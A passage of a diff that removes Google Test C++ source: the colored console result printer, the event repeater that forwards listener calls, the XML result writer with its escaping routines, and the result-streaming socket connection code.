-#if GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_MOBILE && \
-    !GTEST_OS_WINDOWS_PHONE && !GTEST_OS_WINDOWS_RT
-  const HANDLE stdout_handle = GetStdHandle(STD_OUTPUT_HANDLE);
-
-  // Gets the current text color.
-  CONSOLE_SCREEN_BUFFER_INFO buffer_info;
-  GetConsoleScreenBufferInfo(stdout_handle, &buffer_info);
-  const WORD old_color_attrs = buffer_info.wAttributes;
-
-  // We need to flush the stream buffers into the console before each
-  // SetConsoleTextAttribute call lest it affect the text that is already
-  // printed but has not yet reached the console.
-  fflush(stdout);
-  SetConsoleTextAttribute(stdout_handle,
-                          GetColorAttribute(color) | FOREGROUND_INTENSITY);
-  vprintf(fmt, args);
-
-  fflush(stdout);
-  // Restores the text color.
-  SetConsoleTextAttribute(stdout_handle, old_color_attrs);
-#else
-  printf("\033[0;3%sm", GetAnsiColorCode(color));
-  vprintf(fmt, args);
-  printf("\033[m");  // Resets the terminal to default.
-#endif  // GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_MOBILE
-  va_end(args);
-}
-
-// Text printed in Google Test's text output and --gunit_list_tests
-// output to label the type parameter and value parameter for a test.
-static const char kTypeParamLabel[] = "TypeParam";
-static const char kValueParamLabel[] = "GetParam()";
-
-void PrintFullTestCommentIfPresent(const TestInfo& test_info) {
-  const char* const type_param = test_info.type_param();
-  const char* const value_param = test_info.value_param();
-
-  if (type_param != NULL || value_param != NULL) {
-    printf(", where ");
-    if (type_param != NULL) {
-      printf("%s = %s", kTypeParamLabel, type_param);
-      if (value_param != NULL)
-        printf(" and ");
-    }
-    if (value_param != NULL) {
-      printf("%s = %s", kValueParamLabel, value_param);
-    }
-  }
-}
-
-// This class implements the TestEventListener interface.
-//
-// Class PrettyUnitTestResultPrinter is copyable.
-class PrettyUnitTestResultPrinter : public TestEventListener {
- public:
-  PrettyUnitTestResultPrinter() {}
-  static void PrintTestName(const char * test_case, const char * test) {
-    printf("%s.%s", test_case, test);
-  }
-
-  // The following methods override what's in the TestEventListener class.
-  virtual void OnTestProgramStart(const UnitTest& /*unit_test*/) {}
-  virtual void OnTestIterationStart(const UnitTest& unit_test, int iteration);
-  virtual void OnEnvironmentsSetUpStart(const UnitTest& unit_test);
-  virtual void OnEnvironmentsSetUpEnd(const UnitTest& /*unit_test*/) {}
-  virtual void OnTestCaseStart(const TestCase& test_case);
-  virtual void OnTestStart(const TestInfo& test_info);
-  virtual void OnTestPartResult(const TestPartResult& result);
-  virtual void OnTestEnd(const TestInfo& test_info);
-  virtual void OnTestCaseEnd(const TestCase& test_case);
-  virtual void OnEnvironmentsTearDownStart(const UnitTest& unit_test);
-  virtual void OnEnvironmentsTearDownEnd(const UnitTest& /*unit_test*/) {}
-  virtual void OnTestIterationEnd(const UnitTest& unit_test, int iteration);
-  virtual void OnTestProgramEnd(const UnitTest& /*unit_test*/) {}
-
- private:
-  static void PrintFailedTests(const UnitTest& unit_test);
-};
-
-  // Fired before each iteration of tests starts.
-void PrettyUnitTestResultPrinter::OnTestIterationStart(
-    const UnitTest& unit_test, int iteration) {
-  if (GTEST_FLAG(repeat) != 1)
-    printf("\nRepeating all tests (iteration %d) . . .\n\n", iteration + 1);
-
-  const char* const filter = GTEST_FLAG(filter).c_str();
-
-  // Prints the filter if it's not *.  This reminds the user that some
-  // tests may be skipped.
-  if (!String::CStringEquals(filter, kUniversalFilter)) {
-    ColoredPrintf(COLOR_YELLOW,
-                  "Note: %s filter = %s\n", GTEST_NAME_, filter);
-  }
-
-  if (internal::ShouldShard(kTestTotalShards, kTestShardIndex, false)) {
-    const Int32 shard_index = Int32FromEnvOrDie(kTestShardIndex, -1);
-    ColoredPrintf(COLOR_YELLOW,
-                  "Note: This is test shard %d of %s.\n",
-                  static_cast<int>(shard_index) + 1,
-                  internal::posix::GetEnv(kTestTotalShards));
-  }
-
-  if (GTEST_FLAG(shuffle)) {
-    ColoredPrintf(COLOR_YELLOW,
-                  "Note: Randomizing tests' orders with a seed of %d .\n",
-                  unit_test.random_seed());
-  }
-
-  ColoredPrintf(COLOR_GREEN,  "[==========] ");
-  printf("Running %s from %s.\n",
-         FormatTestCount(unit_test.test_to_run_count()).c_str(),
-         FormatTestCaseCount(unit_test.test_case_to_run_count()).c_str());
-  fflush(stdout);
-}
-
-void PrettyUnitTestResultPrinter::OnEnvironmentsSetUpStart(
-    const UnitTest& /*unit_test*/) {
-  ColoredPrintf(COLOR_GREEN,  "[----------] ");
-  printf("Global test environment set-up.\n");
-  fflush(stdout);
-}
-
-void PrettyUnitTestResultPrinter::OnTestCaseStart(const TestCase& test_case) {
-  const std::string counts =
-      FormatCountableNoun(test_case.test_to_run_count(), "test", "tests");
-  ColoredPrintf(COLOR_GREEN, "[----------] ");
-  printf("%s from %s", counts.c_str(), test_case.name());
-  if (test_case.type_param() == NULL) {
-    printf("\n");
-  } else {
-    printf(", where %s = %s\n", kTypeParamLabel, test_case.type_param());
-  }
-  fflush(stdout);
-}
-
-void PrettyUnitTestResultPrinter::OnTestStart(const TestInfo& test_info) {
-  ColoredPrintf(COLOR_GREEN,  "[ RUN      ] ");
-  PrintTestName(test_info.test_case_name(), test_info.name());
-  printf("\n");
-  fflush(stdout);
-}
-
-// Called after an assertion failure.
-void PrettyUnitTestResultPrinter::OnTestPartResult(
-    const TestPartResult& result) {
-  // If the test part succeeded, we don't need to do anything.
-  if (result.type() == TestPartResult::kSuccess)
-    return;
-
-  // Print failure message from the assertion (e.g. expected this and got that).
-  PrintTestPartResult(result);
-  fflush(stdout);
-}
-
-void PrettyUnitTestResultPrinter::OnTestEnd(const TestInfo& test_info) {
-  if (test_info.result()->Passed()) {
-    ColoredPrintf(COLOR_GREEN, "[       OK ] ");
-  } else {
-    ColoredPrintf(COLOR_RED, "[  FAILED  ] ");
-  }
-  PrintTestName(test_info.test_case_name(), test_info.name());
-  if (test_info.result()->Failed())
-    PrintFullTestCommentIfPresent(test_info);
-
-  if (GTEST_FLAG(print_time)) {
-    printf(" (%s ms)\n", internal::StreamableToString(
-           test_info.result()->elapsed_time()).c_str());
-  } else {
-    printf("\n");
-  }
-  fflush(stdout);
-}
-
-void PrettyUnitTestResultPrinter::OnTestCaseEnd(const TestCase& test_case) {
-  if (!GTEST_FLAG(print_time)) return;
-
-  const std::string counts =
-      FormatCountableNoun(test_case.test_to_run_count(), "test", "tests");
-  ColoredPrintf(COLOR_GREEN, "[----------] ");
-  printf("%s from %s (%s ms total)\n\n",
-         counts.c_str(), test_case.name(),
-         internal::StreamableToString(test_case.elapsed_time()).c_str());
-  fflush(stdout);
-}
-
-void PrettyUnitTestResultPrinter::OnEnvironmentsTearDownStart(
-    const UnitTest& /*unit_test*/) {
-  ColoredPrintf(COLOR_GREEN,  "[----------] ");
-  printf("Global test environment tear-down\n");
-  fflush(stdout);
-}
-
-// Internal helper for printing the list of failed tests.
-void PrettyUnitTestResultPrinter::PrintFailedTests(const UnitTest& unit_test) {
-  const int failed_test_count = unit_test.failed_test_count();
-  if (failed_test_count == 0) {
-    return;
-  }
-
-  for (int i = 0; i < unit_test.total_test_case_count(); ++i) {
-    const TestCase& test_case = *unit_test.GetTestCase(i);
-    if (!test_case.should_run() || (test_case.failed_test_count() == 0)) {
-      continue;
-    }
-    for (int j = 0; j < test_case.total_test_count(); ++j) {
-      const TestInfo& test_info = *test_case.GetTestInfo(j);
-      if (!test_info.should_run() || test_info.result()->Passed()) {
-        continue;
-      }
-      ColoredPrintf(COLOR_RED, "[  FAILED  ] ");
-      printf("%s.%s", test_case.name(), test_info.name());
-      PrintFullTestCommentIfPresent(test_info);
-      printf("\n");
-    }
-  }
-}
-
-void PrettyUnitTestResultPrinter::OnTestIterationEnd(const UnitTest& unit_test,
-                                                     int /*iteration*/) {
-  ColoredPrintf(COLOR_GREEN,  "[==========] ");
-  printf("%s from %s ran.",
-         FormatTestCount(unit_test.test_to_run_count()).c_str(),
-         FormatTestCaseCount(unit_test.test_case_to_run_count()).c_str());
-  if (GTEST_FLAG(print_time)) {
-    printf(" (%s ms total)",
-           internal::StreamableToString(unit_test.elapsed_time()).c_str());
-  }
-  printf("\n");
-  ColoredPrintf(COLOR_GREEN,  "[  PASSED  ] ");
-  printf("%s.\n", FormatTestCount(unit_test.successful_test_count()).c_str());
-
-  int num_failures = unit_test.failed_test_count();
-  if (!unit_test.Passed()) {
-    const int failed_test_count = unit_test.failed_test_count();
-    ColoredPrintf(COLOR_RED,  "[  FAILED  ] ");
-    printf("%s, listed below:\n", FormatTestCount(failed_test_count).c_str());
-    PrintFailedTests(unit_test);
-    printf("\n%2d FAILED %s\n", num_failures,
-                        num_failures == 1 ? "TEST" : "TESTS");
-  }
-
-  int num_disabled = unit_test.reportable_disabled_test_count();
-  if (num_disabled && !GTEST_FLAG(also_run_disabled_tests)) {
-    if (!num_failures) {
-      printf("\n");  // Add a spacer if no FAILURE banner is displayed.
-    }
-    ColoredPrintf(COLOR_YELLOW,
-                  "  YOU HAVE %d DISABLED %s\n\n",
-                  num_disabled,
-                  num_disabled == 1 ? "TEST" : "TESTS");
-  }
-  // Ensure that Google Test output is printed before, e.g., heapchecker output.
-  fflush(stdout);
-}
-
-// End PrettyUnitTestResultPrinter
-
-// class TestEventRepeater
-//
-// This class forwards events to other event listeners.
-class TestEventRepeater : public TestEventListener {
- public:
-  TestEventRepeater() : forwarding_enabled_(true) {}
-  virtual ~TestEventRepeater();
-  void Append(TestEventListener *listener);
-  TestEventListener* Release(TestEventListener* listener);
-
-  // Controls whether events will be forwarded to listeners_. Set to false
-  // in death test child processes.
-  bool forwarding_enabled() const { return forwarding_enabled_; }
-  void set_forwarding_enabled(bool enable) { forwarding_enabled_ = enable; }
-
-  virtual void OnTestProgramStart(const UnitTest& unit_test);
-  virtual void OnTestIterationStart(const UnitTest& unit_test, int iteration);
-  virtual void OnEnvironmentsSetUpStart(const UnitTest& unit_test);
-  virtual void OnEnvironmentsSetUpEnd(const UnitTest& unit_test);
-  virtual void OnTestCaseStart(const TestCase& test_case);
-  virtual void OnTestStart(const TestInfo& test_info);
-  virtual void OnTestPartResult(const TestPartResult& result);
-  virtual void OnTestEnd(const TestInfo& test_info);
-  virtual void OnTestCaseEnd(const TestCase& test_case);
-  virtual void OnEnvironmentsTearDownStart(const UnitTest& unit_test);
-  virtual void OnEnvironmentsTearDownEnd(const UnitTest& unit_test);
-  virtual void OnTestIterationEnd(const UnitTest& unit_test, int iteration);
-  virtual void OnTestProgramEnd(const UnitTest& unit_test);
-
- private:
-  // Controls whether events will be forwarded to listeners_. Set to false
-  // in death test child processes.
-  bool forwarding_enabled_;
-  // The list of listeners that receive events.
-  std::vector<TestEventListener*> listeners_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(TestEventRepeater);
-};
-
-TestEventRepeater::~TestEventRepeater() {
-  ForEach(listeners_, Delete<TestEventListener>);
-}
-
-void TestEventRepeater::Append(TestEventListener *listener) {
-  listeners_.push_back(listener);
-}
-
-// TODO(vladl@google.com): Factor the search functionality into Vector::Find.
-TestEventListener* TestEventRepeater::Release(TestEventListener *listener) {
-  for (size_t i = 0; i < listeners_.size(); ++i) {
-    if (listeners_[i] == listener) {
-      listeners_.erase(listeners_.begin() + i);
-      return listener;
-    }
-  }
-
-  return NULL;
-}
-
-// Since most methods are very similar, use macros to reduce boilerplate.
-// This defines a member that forwards the call to all listeners.
-#define GTEST_REPEATER_METHOD_(Name, Type) \
-void TestEventRepeater::Name(const Type& parameter) { \
-  if (forwarding_enabled_) { \
-    for (size_t i = 0; i < listeners_.size(); i++) { \
-      listeners_[i]->Name(parameter); \
-    } \
-  } \
-}
-// This defines a member that forwards the call to all listeners in reverse
-// order.
-#define GTEST_REVERSE_REPEATER_METHOD_(Name, Type) \
-void TestEventRepeater::Name(const Type& parameter) { \
-  if (forwarding_enabled_) { \
-    for (int i = static_cast<int>(listeners_.size()) - 1; i >= 0; i--) { \
-      listeners_[i]->Name(parameter); \
-    } \
-  } \
-}
-
-GTEST_REPEATER_METHOD_(OnTestProgramStart, UnitTest)
-GTEST_REPEATER_METHOD_(OnEnvironmentsSetUpStart, UnitTest)
-GTEST_REPEATER_METHOD_(OnTestCaseStart, TestCase)
-GTEST_REPEATER_METHOD_(OnTestStart, TestInfo)
-GTEST_REPEATER_METHOD_(OnTestPartResult, TestPartResult)
-GTEST_REPEATER_METHOD_(OnEnvironmentsTearDownStart, UnitTest)
-GTEST_REVERSE_REPEATER_METHOD_(OnEnvironmentsSetUpEnd, UnitTest)
-GTEST_REVERSE_REPEATER_METHOD_(OnEnvironmentsTearDownEnd, UnitTest)
-GTEST_REVERSE_REPEATER_METHOD_(OnTestEnd, TestInfo)
-GTEST_REVERSE_REPEATER_METHOD_(OnTestCaseEnd, TestCase)
-GTEST_REVERSE_REPEATER_METHOD_(OnTestProgramEnd, UnitTest)
-
-#undef GTEST_REPEATER_METHOD_
-#undef GTEST_REVERSE_REPEATER_METHOD_
-
-void TestEventRepeater::OnTestIterationStart(const UnitTest& unit_test,
-                                             int iteration) {
-  if (forwarding_enabled_) {
-    for (size_t i = 0; i < listeners_.size(); i++) {
-      listeners_[i]->OnTestIterationStart(unit_test, iteration);
-    }
-  }
-}
-
-void TestEventRepeater::OnTestIterationEnd(const UnitTest& unit_test,
-                                           int iteration) {
-  if (forwarding_enabled_) {
-    for (int i = static_cast<int>(listeners_.size()) - 1; i >= 0; i--) {
-      listeners_[i]->OnTestIterationEnd(unit_test, iteration);
-    }
-  }
-}
-
-// End TestEventRepeater
-
-// This class generates an XML output file.
-class XmlUnitTestResultPrinter : public EmptyTestEventListener {
- public:
-  explicit XmlUnitTestResultPrinter(const char* output_file);
-
-  virtual void OnTestIterationEnd(const UnitTest& unit_test, int iteration);
-
- private:
-  // Is c a whitespace character that is normalized to a space character
-  // when it appears in an XML attribute value?
-  static bool IsNormalizableWhitespace(char c) {
-    return c == 0x9 || c == 0xA || c == 0xD;
-  }
-
-  // May c appear in a well-formed XML document?
-  static bool IsValidXmlCharacter(char c) {
-    return IsNormalizableWhitespace(c) || c >= 0x20;
-  }
-
-  // Returns an XML-escaped copy of the input string str.  If
-  // is_attribute is true, the text is meant to appear as an attribute
-  // value, and normalizable whitespace is preserved by replacing it
-  // with character references.
-  static std::string EscapeXml(const std::string& str, bool is_attribute);
-
-  // Returns the given string with all characters invalid in XML removed.
-  static std::string RemoveInvalidXmlCharacters(const std::string& str);
-
-  // Convenience wrapper around EscapeXml when str is an attribute value.
-  static std::string EscapeXmlAttribute(const std::string& str) {
-    return EscapeXml(str, true);
-  }
-
-  // Convenience wrapper around EscapeXml when str is not an attribute value.
-  static std::string EscapeXmlText(const char* str) {
-    return EscapeXml(str, false);
-  }
-
-  // Verifies that the given attribute belongs to the given element and
-  // streams the attribute as XML.
-  static void OutputXmlAttribute(std::ostream* stream,
-                                 const std::string& element_name,
-                                 const std::string& name,
-                                 const std::string& value);
-
-  // Streams an XML CDATA section, escaping invalid CDATA sequences as needed.
-  static void OutputXmlCDataSection(::std::ostream* stream, const char* data);
-
-  // Streams an XML representation of a TestInfo object.
-  static void OutputXmlTestInfo(::std::ostream* stream,
-                                const char* test_case_name,
-                                const TestInfo& test_info);
-
-  // Prints an XML representation of a TestCase object
-  static void PrintXmlTestCase(::std::ostream* stream,
-                               const TestCase& test_case);
-
-  // Prints an XML summary of unit_test to output stream out.
-  static void PrintXmlUnitTest(::std::ostream* stream,
-                               const UnitTest& unit_test);
-
-  // Produces a string representing the test properties in a result as space
-  // delimited XML attributes based on the property key="value" pairs.
-  // When the std::string is not empty, it includes a space at the beginning,
-  // to delimit this attribute from prior attributes.
-  static std::string TestPropertiesAsXmlAttributes(const TestResult& result);
-
-  // The output file.
-  const std::string output_file_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(XmlUnitTestResultPrinter);
-};
-
-// Creates a new XmlUnitTestResultPrinter.
-XmlUnitTestResultPrinter::XmlUnitTestResultPrinter(const char* output_file)
-    : output_file_(output_file) {
-  if (output_file_.c_str() == NULL || output_file_.empty()) {
-    fprintf(stderr, "XML output file may not be null\n");
-    fflush(stderr);
-    exit(EXIT_FAILURE);
-  }
-}
-
-// Called after the unit test ends.
-void XmlUnitTestResultPrinter::OnTestIterationEnd(const UnitTest& unit_test,
-                                                  int /*iteration*/) {
-  FILE* xmlout = NULL;
-  FilePath output_file(output_file_);
-  FilePath output_dir(output_file.RemoveFileName());
-
-  if (output_dir.CreateDirectoriesRecursively()) {
-    xmlout = posix::FOpen(output_file_.c_str(), "w");
-  }
-  if (xmlout == NULL) {
-    // TODO(wan): report the reason of the failure.
-    //
-    // We don't do it for now as:
-    //
-    //   1. There is no urgent need for it.
-    //   2. It's a bit involved to make the errno variable thread-safe on
-    //      all three operating systems (Linux, Windows, and Mac OS).
-    //   3. To interpret the meaning of errno in a thread-safe way,
-    //      we need the strerror_r() function, which is not available on
-    //      Windows.
-    fprintf(stderr,
-            "Unable to open file \"%s\"\n",
-            output_file_.c_str());
-    fflush(stderr);
-    exit(EXIT_FAILURE);
-  }
-  std::stringstream stream;
-  PrintXmlUnitTest(&stream, unit_test);
-  fprintf(xmlout, "%s", StringStreamToString(&stream).c_str());
-  fclose(xmlout);
-}
-
-// Returns an XML-escaped copy of the input string str.  If is_attribute
-// is true, the text is meant to appear as an attribute value, and
-// normalizable whitespace is preserved by replacing it with character
-// references.
-//
-// Invalid XML characters in str, if any, are stripped from the output.
-// It is expected that most, if not all, of the text processed by this
-// module will consist of ordinary English text.
-// If this module is ever modified to produce version 1.1 XML output,
-// most invalid characters can be retained using character references.
-// TODO(wan): It might be nice to have a minimally invasive, human-readable
-// escaping scheme for invalid characters, rather than dropping them.
-std::string XmlUnitTestResultPrinter::EscapeXml(
-    const std::string& str, bool is_attribute) {
-  Message m;
-
-  for (size_t i = 0; i < str.size(); ++i) {
-    const char ch = str[i];
-    switch (ch) {
-      case '<':
-        m << "&lt;";
-        break;
-      case '>':
-        m << "&gt;";
-        break;
-      case '&':
-        m << "&amp;";
-        break;
-      case '\'':
-        if (is_attribute)
-          m << "&apos;";
-        else
-          m << '\'';
-        break;
-      case '"':
-        if (is_attribute)
-          m << "&quot;";
-        else
-          m << '"';
-        break;
-      default:
-        if (IsValidXmlCharacter(ch)) {
-          if (is_attribute && IsNormalizableWhitespace(ch))
-            m << "&#x" << String::FormatByte(static_cast<unsigned char>(ch))
-              << ";";
-          else
-            m << ch;
-        }
-        break;
-    }
-  }
-
-  return m.GetString();
-}
-
-// Returns the given string with all characters invalid in XML removed.
-// Currently invalid characters are dropped from the string. An
-// alternative is to replace them with certain characters such as . or ?.
-std::string XmlUnitTestResultPrinter::RemoveInvalidXmlCharacters(
-    const std::string& str) {
-  std::string output;
-  output.reserve(str.size());
-  for (std::string::const_iterator it = str.begin(); it != str.end(); ++it)
-    if (IsValidXmlCharacter(*it))
-      output.push_back(*it);
-
-  return output;
-}
-
-// The following routines generate an XML representation of a UnitTest
-// object.
-//
-// This is how Google Test concepts map to the DTD:
-//
-// <testsuites name="AllTests">        <-- corresponds to a UnitTest object
-//   <testsuite name="testcase-name">  <-- corresponds to a TestCase object
-//     <testcase name="test-name">     <-- corresponds to a TestInfo object
-//       <failure message="...">...</failure>
-//       <failure message="...">...</failure>
-//       <failure message="...">...</failure>
-//                                     <-- individual assertion failures
-//     </testcase>
-//   </testsuite>
-// </testsuites>
-
-// Formats the given time in milliseconds as seconds.
-std::string FormatTimeInMillisAsSeconds(TimeInMillis ms) {
-  ::std::stringstream ss;
-  ss << ms/1000.0;
-  return ss.str();
-}
-
-static bool PortableLocaltime(time_t seconds, struct tm* out) {
-#if defined(_MSC_VER)
-  return localtime_s(out, &seconds) == 0;
-#elif defined(__MINGW32__) || defined(__MINGW64__)
-  // MINGW <time.h> provides neither localtime_r nor localtime_s, but uses
-  // Windows' localtime(), which has a thread-local tm buffer.
-  struct tm* tm_ptr = localtime(&seconds);  // NOLINT
-  if (tm_ptr == NULL)
-    return false;
-  *out = *tm_ptr;
-  return true;
-#else
-  return localtime_r(&seconds, out) != NULL;
-#endif
-}
-
-// Converts the given epoch time in milliseconds to a date string in the ISO
-// 8601 format, without the timezone information.
-std::string FormatEpochTimeInMillisAsIso8601(TimeInMillis ms) {
-  struct tm time_struct;
-  if (!PortableLocaltime(static_cast<time_t>(ms / 1000), &time_struct))
-    return "";
-  // YYYY-MM-DDThh:mm:ss
-  return StreamableToString(time_struct.tm_year + 1900) + "-" +
-      String::FormatIntWidth2(time_struct.tm_mon + 1) + "-" +
-      String::FormatIntWidth2(time_struct.tm_mday) + "T" +
-      String::FormatIntWidth2(time_struct.tm_hour) + ":" +
-      String::FormatIntWidth2(time_struct.tm_min) + ":" +
-      String::FormatIntWidth2(time_struct.tm_sec);
-}
-
-// Streams an XML CDATA section, escaping invalid CDATA sequences as needed.
-void XmlUnitTestResultPrinter::OutputXmlCDataSection(::std::ostream* stream,
-                                                     const char* data) {
-  const char* segment = data;
-  *stream << "<![CDATA[";
-  for (;;) {
-    const char* const next_segment = strstr(segment, "]]>");
-    if (next_segment != NULL) {
-      stream->write(
-          segment, static_cast<std::streamsize>(next_segment - segment));
-      *stream << "]]>]]&gt;<![CDATA[";
-      segment = next_segment + strlen("]]>");
-    } else {
-      *stream << segment;
-      break;
-    }
-  }
-  *stream << "]]>";
-}
-
-void XmlUnitTestResultPrinter::OutputXmlAttribute(
-    std::ostream* stream,
-    const std::string& element_name,
-    const std::string& name,
-    const std::string& value) {
-  const std::vector<std::string>& allowed_names =
-      GetReservedAttributesForElement(element_name);
-
-  GTEST_CHECK_(std::find(allowed_names.begin(), allowed_names.end(), name) !=
-                   allowed_names.end())
-      << "Attribute " << name << " is not allowed for element <" << element_name
-      << ">.";
-
-  *stream << " " << name << "=\"" << EscapeXmlAttribute(value) << "\"";
-}
-
-// Prints an XML representation of a TestInfo object.
-// TODO(wan): There is also value in printing properties with the plain printer.
-void XmlUnitTestResultPrinter::OutputXmlTestInfo(::std::ostream* stream,
-                                                 const char* test_case_name,
-                                                 const TestInfo& test_info) {
-  const TestResult& result = *test_info.result();
-  const std::string kTestcase = "testcase";
-
-  *stream << "    <testcase";
-  OutputXmlAttribute(stream, kTestcase, "name", test_info.name());
-
-  if (test_info.value_param() != NULL) {
-    OutputXmlAttribute(stream, kTestcase, "value_param",
-                       test_info.value_param());
-  }
-  if (test_info.type_param() != NULL) {
-    OutputXmlAttribute(stream, kTestcase, "type_param", test_info.type_param());
-  }
-
-  OutputXmlAttribute(stream, kTestcase, "status",
-                     test_info.should_run() ? "run" : "notrun");
-  OutputXmlAttribute(stream, kTestcase, "time",
-                     FormatTimeInMillisAsSeconds(result.elapsed_time()));
-  OutputXmlAttribute(stream, kTestcase, "classname", test_case_name);
-  *stream << TestPropertiesAsXmlAttributes(result);
-
-  int failures = 0;
-  for (int i = 0; i < result.total_part_count(); ++i) {
-    const TestPartResult& part = result.GetTestPartResult(i);
-    if (part.failed()) {
-      if (++failures == 1) {
-        *stream << ">\n";
-      }
-      const string location = internal::FormatCompilerIndependentFileLocation(
-          part.file_name(), part.line_number());
-      const string summary = location + "\n" + part.summary();
-      *stream << "      <failure message=\""
-              << EscapeXmlAttribute(summary.c_str())
-              << "\" type=\"\">";
-      const string detail = location + "\n" + part.message();
-      OutputXmlCDataSection(stream, RemoveInvalidXmlCharacters(detail).c_str());
-      *stream << "</failure>\n";
-    }
-  }
-
-  if (failures == 0)
-    *stream << " />\n";
-  else
-    *stream << "    </testcase>\n";
-}
-
-// Prints an XML representation of a TestCase object
-void XmlUnitTestResultPrinter::PrintXmlTestCase(std::ostream* stream,
-                                                const TestCase& test_case) {
-  const std::string kTestsuite = "testsuite";
-  *stream << "  <" << kTestsuite;
-  OutputXmlAttribute(stream, kTestsuite, "name", test_case.name());
-  OutputXmlAttribute(stream, kTestsuite, "tests",
-                     StreamableToString(test_case.reportable_test_count()));
-  OutputXmlAttribute(stream, kTestsuite, "failures",
-                     StreamableToString(test_case.failed_test_count()));
-  OutputXmlAttribute(
-      stream, kTestsuite, "disabled",
-      StreamableToString(test_case.reportable_disabled_test_count()));
-  OutputXmlAttribute(stream, kTestsuite, "errors", "0");
-  OutputXmlAttribute(stream, kTestsuite, "time",
-                     FormatTimeInMillisAsSeconds(test_case.elapsed_time()));
-  *stream << TestPropertiesAsXmlAttributes(test_case.ad_hoc_test_result())
-          << ">\n";
-
-  for (int i = 0; i < test_case.total_test_count(); ++i) {
-    if (test_case.GetTestInfo(i)->is_reportable())
-      OutputXmlTestInfo(stream, test_case.name(), *test_case.GetTestInfo(i));
-  }
-  *stream << "  </" << kTestsuite << ">\n";
-}
-
-// Prints an XML summary of unit_test to output stream out.
-void XmlUnitTestResultPrinter::PrintXmlUnitTest(std::ostream* stream,
-                                                const UnitTest& unit_test) {
-  const std::string kTestsuites = "testsuites";
-
-  *stream << "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
-  *stream << "<" << kTestsuites;
-
-  OutputXmlAttribute(stream, kTestsuites, "tests",
-                     StreamableToString(unit_test.reportable_test_count()));
-  OutputXmlAttribute(stream, kTestsuites, "failures",
-                     StreamableToString(unit_test.failed_test_count()));
-  OutputXmlAttribute(
-      stream, kTestsuites, "disabled",
-      StreamableToString(unit_test.reportable_disabled_test_count()));
-  OutputXmlAttribute(stream, kTestsuites, "errors", "0");
-  OutputXmlAttribute(
-      stream, kTestsuites, "timestamp",
-      FormatEpochTimeInMillisAsIso8601(unit_test.start_timestamp()));
-  OutputXmlAttribute(stream, kTestsuites, "time",
-                     FormatTimeInMillisAsSeconds(unit_test.elapsed_time()));
-
-  if (GTEST_FLAG(shuffle)) {
-    OutputXmlAttribute(stream, kTestsuites, "random_seed",
-                       StreamableToString(unit_test.random_seed()));
-  }
-
-  *stream << TestPropertiesAsXmlAttributes(unit_test.ad_hoc_test_result());
-
-  OutputXmlAttribute(stream, kTestsuites, "name", "AllTests");
-  *stream << ">\n";
-
-  for (int i = 0; i < unit_test.total_test_case_count(); ++i) {
-    if (unit_test.GetTestCase(i)->reportable_test_count() > 0)
-      PrintXmlTestCase(stream, *unit_test.GetTestCase(i));
-  }
-  *stream << "</" << kTestsuites << ">\n";
-}
-
-// Produces a string representing the test properties in a result as space
-// delimited XML attributes based on the property key="value" pairs.
-std::string XmlUnitTestResultPrinter::TestPropertiesAsXmlAttributes(
-    const TestResult& result) {
-  Message attributes;
-  for (int i = 0; i < result.test_property_count(); ++i) {
-    const TestProperty& property = result.GetTestProperty(i);
-    attributes << " " << property.key() << "="
-        << "\"" << EscapeXmlAttribute(property.value()) << "\"";
-  }
-  return attributes.GetString();
-}
-
-// End XmlUnitTestResultPrinter
-
-#if GTEST_CAN_STREAM_RESULTS_
-
-// Checks if str contains '=', '&', '%' or '\n' characters. If yes,
-// replaces them by "%xx" where xx is their hexadecimal value. For
-// example, replaces "=" with "%3D".  This algorithm is O(strlen(str))
-// in both time and space -- important as the input str may contain an
-// arbitrarily long test failure message and stack trace.
-string StreamingListener::UrlEncode(const char* str) {
-  string result;
-  result.reserve(strlen(str) + 1);
-  for (char ch = *str; ch != '\0'; ch = *++str) {
-    switch (ch) {
-      case '%':
-      case '=':
-      case '&':
-      case '\n':
-        result.append("%" + String::FormatByte(static_cast<unsigned char>(ch)));
-        break;
-      default:
-        result.push_back(ch);
-        break;
-    }
-  }
-  return result;
-}
-
-void StreamingListener::SocketWriter::MakeConnection() {
-  GTEST_CHECK_(sockfd_ == -1)
-      << "MakeConnection() can't be called when there is already a connection.";
-
-  addrinfo hints;
-  memset(&hints, 0, sizeof(hints));
-  hints.ai_family = AF_UNSPEC;    // To allow both IPv4 and IPv6 addresses.
-  hints.ai_socktype = SOCK_STREAM;
-  addrinfo* servinfo = NULL;
-
-  // Use the getaddrinfo() to get a linked list of IP addresses for
-  // the given host name.
-  const int error_num = getaddrinfo(
-      host_name_.c_str(), port_num_.c_str(), &hints, &servinfo);
-  if (error_num != 0) {
-    GTEST_LOG_(WARNING) << "stream_result_to: getaddrinfo() failed: "
-                        << gai_strerror(error_num);
-  }
-
-  // Loop through all the results and connect to the first we can.
-  for (addrinfo* cur_addr = servinfo; sockfd_ == -1 && cur_addr != NULL;
-       cur_addr = cur_addr->ai_next) {
-    sockfd_ = socket(
-        cur_addr->ai_family, cur_addr->ai_socktype, cur_addr->ai_protocol);
-    if (sockfd_ != -1) {
-      // Connect the client socket to the server socket.
-      if (connect(sockfd_, cur_addr->ai_addr, cur_addr->ai_addrlen) == -1) {
-        close(sockfd_);
-        sockfd_ = -1;
-      }
-    }
-  }
-
-  freeaddrinfo(servinfo);  // all done with this structure
-
-  if (sockfd_ == -1) {
-    GTEST_LOG_(WARNING) << "stream_result_to: failed to connect to "
-                        << host_name_ << ":" << port_num_;
-  }
-}
-
-// End of class Streaming Listener
-#endif  // GTEST_CAN_STREAM_RESULTS__
-
-// Class ScopedTrace
-
-// Pushes the given source file location and message onto a per-thread
-// trace stack maintained by Google Test.
-ScopedTrace::ScopedTrace(const char* file, int line, const Message& message)
-    GTEST_LOCK_EXCLUDED_(&UnitTest::mutex_) {
-  TraceInfo trace;
-  trace.file = file;
-  trace.line = line;
-  trace.message = message.GetString();
-
-  UnitTest::GetInstance()->PushGTestTrace(trace);
-}
-
-// Pops the info pushed by the c'tor.
-ScopedTrace::~ScopedTrace()
-    GTEST_LOCK_EXCLUDED_(&UnitTest::mutex_) {
-  UnitTest::GetInstance()->PopGTestTrace();
-}
-
-
-// class OsStackTraceGetter
-
-// Returns the current OS stack trace as an std::string.  Parameters:
-//
-//   max_depth  - the maximum number of stack frames to be included
-//                in the trace.
-//   skip_count - the number of top frames to be skipped; doesn't count
-//                against max_depth.
-//
